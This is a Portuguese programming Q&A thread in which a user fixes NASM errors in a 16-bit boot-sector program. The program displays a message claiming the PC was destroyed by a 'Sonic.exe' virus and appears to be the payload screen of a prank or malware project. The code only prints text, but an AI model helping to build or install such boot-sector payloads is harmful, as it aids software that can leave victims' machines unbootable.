# Como eu faço para eu resolver esse problema no assembly?

Tags: assembly, binary, nasm

Eu fiz esse programa em assembly e tentei transformar em um arquivo .bin usando o NASM, e deu os seguintes erros:

C:\Users\felip\Desktop\sonic.exe\payload\game_over.asm:31: warning: character constant too long [-w+other]

C:\Users\felip\Desktop\sonic.exe\payload\game_over.asm:31: error: expecting `)'

Como eu faço para resolver isso?

```
org 0x7c00
bits 16

start:
       call cls; 
       mov bx, display ;
      
print:
       mov al, [bx]
       cmp al, 0 ;
       je halt ;
       call print_char ;
       inc bx
       jmp print
       
print_char:
        mov ah,  0x0e
        int 0x10
        ret
        
        ret
        
mov ah, 0x07
mov al, 0x00
mov bh, 0x04
mov cx, 0x00
mov dx, 0x184f
int 0x10
ret

display db ("seu pc acabou de ser destruido pelo Sonic.exe, 13, 10 "Esse virus foi criado por Dragon Toons Animation", 13, 10, 0") 
times 510 - ($ - $$) db 0
dw 0xaa55
```

Answer (score -1):

Aqui está o codigo corrigido:

```
org 0x7c00
bits 16

start:
       call cls; 
       mov bx, display ;
      
print:
       mov al, [bx]
       cmp al, 0 ;
       je halt ;
       call print_char ;
       inc bx
       jmp print
       
print_char:
        mov ah,  0x0e
        int 0x10
        ret
        
halt:
        ret
        
cls:
        mov ah, 0x07
        mov al, 0x00
        mov bh, 0x04
        mov cx, 0x00
        mov dx, 0x184f
        int 0x10
        ret

display db "seu pc acabou de ser destruido pelo Sonic.exe", 13, 10, "Esse virus foi criado por Dragon Toons Animation", 13, 10, 0 ; obs: não é necessário os '(' e ')'
times 510 - ($ - $$) db 0
dw 0xaa55
```

deu certo? me avise se deu e se não deu certo(nesse caso me mostre os erros ou mensagens de perigo)

Comment: Opa, valeu ae pela resposta

Comment: Sem problema! Qualquer divida pode vir aqui perguntar!